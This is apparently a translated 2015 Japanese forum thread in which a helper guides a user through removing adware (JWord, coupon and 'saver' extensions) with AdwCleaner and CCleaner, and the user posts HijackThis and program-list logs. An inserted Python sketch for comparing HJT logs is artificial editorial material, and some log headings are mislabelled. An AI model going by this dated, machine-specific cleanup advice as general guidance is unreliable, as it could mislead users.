Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1
Mozilla Maintenance Service Mozilla 2015/04/04 391 KB 37.0.1
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Skype Click to Call Microsoft Corporation 2015/04/04 13.1 MB 7.3.16540.9015
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム・デバイス・マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす3学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないR Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000

That is all.
  • かなは
  • 2015/04/04 (Sat) 19:33:06
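Let's deal with it using AC
I have looked over the logs.
Jword is stubbornly hanging on, isn't it.
We'll have a tool deal with this in the course of wiping out the main body.

Please prepare the following software.

"AdwCleaner" (commonly called AC)
http://www.bleepingcomputer.com/download/adwcleaner/dl/125/
This is a direct link to the file. Access it and save the file somewhere easy to find.
Launching the software once will automatically start an update.
When the update is complete, close it for now without doing anything.
When you are instructed to remove this software, pressing the "Uninstall" button after launching it will remove it automatically.

Once you are ready, let's begin the work.

Start the PC in Safe Mode.
Launch AC and click Scan (スキャン in the Japanese interface).
When the scan finishes, click Cleaning (除去 in the Japanese interface) to clean up.
When cleaning completes you will be asked to restart; follow the instructions and restart in normal mode.
This moves you from Safe Mode to normal mode.
The AC log will be displayed either before or after the restart, so save it somewhere easy to find.

After that, launch CC.
Once it has started, open "Tools" → "Startup" → the "Windows" tab.
Pressing "Save as text" at the bottom right there saves the displayed contents as a log,
so save only the latest log somewhere easy to find, such as the desktop.
Next, obtain the log of the "Internet Explorer" tab, the "Firefox" tab if you have it installed,
likewise the "Google Chrome" tab if you have it installed, and the log of the "Scheduled Tasks" tab.
However, you do not need to obtain the "Context Menu" log.
Once you have obtained each of the CC logs, you may close CC.
Re-acquire the HJT log and the CC installed-programs log.
Please paste the AC, HJT and CC logs into the reply box and report back.
After checking the above logs, I will guide you through the next steps.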
  • IVNO
  • MAIL
  • 2015/04/04 (Sat) 19:43:09
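The remark above that JWord still remains after the fix can be checked mechanically by comparing the entries that were marked for fixing with the follow-up HJT log. The following Python sketch is an added example, not part of the original posts and not HijackThis's own code; the function names are hypothetical, and the sample lines are a short excerpt of the fix list and the follow-up log posted in this thread.

```python
import re

# A HijackThis result line is "<section code> - <detail>", for example
# "O4 - HKLM\..\Run: [Name] C:\path\file.exe". Header lines and the
# "Running processes" paths do not match this pattern and are skipped.
RESULT_RE = re.compile(r"^([RFNO]\d{1,2}) - (.+)$")
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# Sections whose entries are COM objects identified by a CLSID.
CLSID_SECTIONS = {"O2", "O3", "O9", "O16", "O18"}


def parse_hjt(text):
    """Return [(code, detail), ...] for each result line of a pasted HJT log."""
    entries = []
    for raw in text.splitlines():
        m = RESULT_RE.match(raw.strip())
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def entry_key(code, detail):
    """Identity used to compare one entry across two logs.

    COM-based entries are keyed by CLSID, which survives a renamed DLL or
    display name. Everything else is keyed by its detail text, case-folded
    (Windows paths are case-insensitive) with the "(file missing)" suffix
    and repeated whitespace removed. 8.3 short paths such as PROGRA~2 are
    compared as written; they cannot be expanded offline.
    """
    if code in CLSID_SECTIONS:
        clsid = CLSID_RE.search(detail)
        if clsid:
            return (code, clsid.group(0).lower())
    text = detail.replace("(file missing)", "")
    return (code, " ".join(text.split()).casefold())


def still_present(fix_list_text, followup_log_text):
    """Entries from the fix list that show up again in the follow-up log."""
    after = {entry_key(c, d) for c, d in parse_hjt(followup_log_text)}
    return [(c, d) for c, d in parse_hjt(fix_list_text) if entry_key(c, d) in after]


# Excerpt of the entries the helper asked to check before "Fix checked".
FIX_LIST = r"""
O2 - BHO: TakeTHeCoupon - {6a6b254b-05d3-451a-9396-b7247e2e114e} - C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.dll
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
"""

# Excerpt of the follow-up log saved at 19:28:57, including non-result lines.
FOLLOWUP_LOG = r"""
Logfile of Trend Micro HijackThis v2.0.4
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Skype\Phone\Skype.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O11 - Options group: [!CNS] JWord(日本語キーワード)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
"""

if __name__ == "__main__":
    for code, detail in still_present(FIX_LIST, FOLLOWUP_LOG):
        print(f"still present: {code} - {detail}")
```

The comparison is exact per entry, so related leftovers under a different section, such as the O11 JWord options group in the follow-up log, still need a manual read of the log.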
Re: I'm troubled by pop-ups and ads being forcibly displayed.
The work is finished, so I am pasting the logs below.
Please continue with the instructions.

HJT
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:56:22, on 2015/04/04
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9896 bytes

CC

Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/04/04 5.04
Common GameOn 2014/11/13 46603608
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
KDrive kingsoft 2014/11/13 1.21.0.1584
KDriveプラグイン kingsoft 2014/11/13 1.0.0.1
Lagarith Lossless Codec (1.3.27) 2014/02/15 1.02 MB
LAME v3.99.3 (for Windows) 2014/02/15 1.52 MB
Lhaplus 2014/11/13
LightCapture I-O DATA DEVICE,INC. 2014/02/12 1.10.0000
LimeChat 2 Satoshi Nakagawa 2014/11/13 2.40
LINE LINE Corporation 2014/11/13 3.7.3.82
Microsoft Age of Empires II 2014/11/13
Microsoft Age of Empires II: The Conquerors Expansion 2014/11/13
Microsoft OneDrive Microsoft Corporation 2015/03/13 30.6 MB 17.3.4726.0226
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/08/19 2.69 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2014/02/12 3.70 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2014/06/30 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/10/30 10.2 MB 9.0.30729
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/04/12 11.1 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 Microsoft Corporation 2014/11/13 20.5 MB 11.0.60610.1
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 Microsoft Corporation 2014/11/13 17.3 MB 11.0.60610.1
Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1
Mozilla Maintenance Service Mozilla 2015/04/04 391 KB 37.0.1
MyBookEditor4 Asukanet 2015/02/05 46.0 MB 1.3.76
NeoplePlugin 2014/11/13
Niconico Live Encoder niwango, inc. 2014/08/06 2.0.4
OpenSource Flash Video Splitter 1.0.0.5 2014/11/13 1.0.0.5
Pmangインストールマネージャー GameOn,Pmang 2014/11/13 1.0.1.1
Project 64 version 2.1.0.1 2014/11/13 9.64 MB 2.1.0.1
QuickTime 7 Apple Inc. 2014/08/30 70.2 MB 7.75.80.95
RPGツクール2000 ランタイムパッケージ 2014/11/13
RPGツクールVX Ace RTP Enterbrain 2014/03/14 194 MB 1.00
Skype Click to Call Microsoft Corporation 2015/04/04 13.1 MB 7.3.16540.9015
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
SoundEngine Free Coderium 2012/10/31 5.0.0.6
Steam Valve Corporation 2014/11/13
TalesWeaver 2014/12/27
TERA GameOn 2015/02/12 8177808
Update for Japanese Microsoft IME Postal Code Dictionary Microsoft Corporation 2014/11/16 7.60 MB 16.0.1171.1
Update for Japanese Microsoft IME Standard Dictionary Microsoft Corporation 2014/11/16 40.3 MB 16.0.1404.1
Update for Japanese Microsoft IME Standard Extended Dictionary Microsoft Corporation 2014/11/16 11.5 MB 15.0.1215
Update for Japanese Microsoft IME Trending Words Dictionary Microsoft Corporation 2015/01/07 17.0 KB 16.0.1016.1
USB PC Camera (SN9C102) 2014/11/13 4.7.5.0
Ut Video Codec Suite UMEZAWA Takeshi 2013/10/28 1.97 MB 13.3.0
VIA プラットフォーム・デバイス・マネージャ VIA Technologies, Inc. 2012/10/30 2.62 MB 1.39
♪超録 - パソコン長時間録音機 フリーウェア版 2014/11/13
つよきす3学期 INTERHEART 2014/11/13 4.88 GB 1.9
ニコ生デスクトップキャプチャー(XP) SEASON2 Consolas 2012/10/31 1.41 MB 1.15
モンスターハンター フロンティアG CAPCOM CO., LTD. 2014/08/21 1.27.2000
俺たちに翼はないR Navel 2014/11/20 Version 1.00
幻想神域 X-Legend 2014/05/16 1.0000


AC "Windows"

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper SaverExxtensiion C:\Program Files (x86)\SaverExxtensiion\LyRYa1TqoTYmQU.x64.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Helper TakeTHeCoupon C:\Program Files (x86)\TakeTHeCoupon\CWRQMaSXmAvceq.x64.dll


AC "Firefox"
有効 Extension AAlllSaveer 1.4 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\Rw@pKVf9.net
有効 Extension DaigiCoupon 5.3 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\QoDQ@B.com
有効 Extension HGPlugin 1.1.0.0 NHN PlayArt default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\hgplugin@hangame.co.jp
有効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default Firefox 37.0.1 c:\program files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
有効 Extension UnIDealsi 2.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\KyK6@ymFhfOn.org
有効 Extension youtubeadblocker 1.0 default Firefox 37.0.1 C:\Users\ryota\AppData\Roaming\Mozilla\Firefox\Profiles\huvep8mo.default\extensions\sK8@H4N8xo.org
有効 Plugin Adobe Acrobat 11.0.10.32 Adobe Systems Inc. default Firefox 37.0.1 C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin DivX VOD Helper Plug-in 1.1.0.12 DivX, LLC. default Firefox 37.0.1 C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll
有効 Plugin Gamepot Execution Environment 1.0.0.3 Gamepot Inc. default Firefox 37.0.1 C:\Program Files (x86)\Gamepot\GPEXE\npGPEXE.dll
有効 Plugin Google Update 1.3.22.3 Google Inc. default Firefox 37.0.1 C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.1.42.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.1.42.0 Intel Corporation default Firefox 37.0.1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin neople game installer for firefox 1.0.0.17 default Firefox 37.0.1 C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 37.0.1 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin pmangsupport 1.0.0.1 default Firefox 37.0.1 C:\Users\ryota\Desktop\譁ー縺励>繝輔か繝ォ繝€繝シ\GameOn\TERA\nppmangsupport.dll
有効 Plugin QuickTime Plug-in 7.7.5 7.7.5.0 Apple Inc. default Firefox 37.0.1 C:\Program Files (x86)\QuickTime\Plugins\npqtplugin5.dll
有効 Plugin Shockwave Flash 16.0.0.305 Adobe Systems Incorporated default Firefox 37.0.1 C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll

AC "Google Chrome"
有効 App Gmail 8.1 最初のユーザー C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
